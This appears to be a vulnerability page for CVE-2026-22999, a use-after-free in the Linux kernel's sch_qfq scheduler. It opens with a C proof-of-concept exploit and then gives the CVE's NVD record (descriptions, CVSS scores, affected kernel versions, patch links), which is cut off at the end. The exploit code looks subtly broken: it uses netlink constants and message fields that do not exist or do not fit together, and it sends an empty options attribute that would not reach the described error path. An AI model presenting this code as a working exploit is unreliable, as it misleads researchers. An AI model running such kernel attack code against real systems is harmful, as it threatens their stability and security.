CVE-2026-22999

/* * CVE-2026-22999 PoC - Linux kernel sch_qfq UAF vulnerability * For educational and security research purposes only. * Compile: gcc -o cve202622999 cve202622999.c -lmnl * Usage: ./cve202622999 <interface> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <net/if.h> #include <linux/netlink.h> #include <linux/tc_ematch/tc_em_ipt.h> #include <linux/pkt_cls.h> #include <libmnl/libmnl.h> #define TCA_QFQ_INIT 28 int send_qfq_netlink_msg(const char *ifname) { struct mnl_socket *nl; char buf[MNL_SOCKET_BUFFER_SIZE]; struct nlmsghdr *nlh; struct tcmsg *tcm; unsigned int ifindex; ifindex = if_nametoindex(ifname); if (!ifindex) { fprintf(stderr, "[-] Invalid interface: %s\n", ifname); return -1; } nl = mnl_socket_open(NETLINK_ROUTE); if (!nl) { perror("[-] mnl_socket_open"); return -1; } if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) { perror("[-] mnl_socket_bind"); return -1; } nlh = mnl_nlmsg_put_header(buf); nlh->nlmsg_type = RTM_NEWTCF; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; nlh->nlmsg_seq = time(NULL); tcm = mnl_nlmsg_put_extra_header(nlh, sizeof(*tcm)); tcm->tcm_family = AF_UNSPEC; tcm->tcm_ifindex = ifindex; tcm->tcm_handle = 0x00010001; tcm->tcm_parent = TC_H_ROOT; tcm->tcm_info = TC_H_MAKE(TCHT_MIX, TCA_QFQ_INIT); // Trigger error path in qfq_change_class // by sending malformed qfq class configuration struct rtattr *rta = mnl_nlmsg_put_extra_header(nlh, RTA_SPACE(64)); rta->rta_type = TCA_OPTIONS; printf("[*] Sending crafted netlink message to trigger UAF...\n"); if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) { perror("[-] mnl_socket_sendto"); return -1; } mnl_socket_close(nl); printf("[+] Netlink message sent, check system stability.\n"); return 0; } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <interface>\n", argv[0]); return 1; } printf("[*] CVE-2026-22999 PoC - sch_qfq qdisc UAF\n"); return send_qfq_netlink_msg(argv[1]); }

{"cve": {"id": "CVE-2026-22999", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:54.753", "lastModified": "2026-04-27T14:16:28.767", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl->qdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet/sched: sch_qfq: no liberar la clase existente en qfq_change_class()\n\nCorrige el caso de error de qfq_change_class().\n\ncl-&gt;qdisc y cl solo deben liberarse si se asignaron una nueva clase y qdisc, o nos arriesgamos a varios UAF."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.8", "versionEndExcluding": "5.10.249", "matchCriteriaId": "C1D3B462-A229-4130-A191-F09550344C59"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.199", "matchCriteriaId": "A247FBA6-BEB9-484F-B892-DD5517949CCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.67", "matchCriteriaId": "7456F614-6AA8-4C08-8229-BA342D4AFBAD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.7", "matchCriteriaId": "99FF3E05-0E7A-44E9-8E47-BF6F1F8EC436"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0a234660dc70ce45d771cbc76b20d925b73ec160", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2a64fb9b47afffeb5dbab5fd3a518e1436dcc90e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/362e269bb03f7076ba9990e518aeddb898232e50", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3879cffd9d07aa0377c4b8835c4f64b4fb24ac78", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cff6cd703f41d8071995956142729e4bba160363", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e9d8f11652fa08c647bf7bba7dd8163241a332cd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.ker ... (truncated)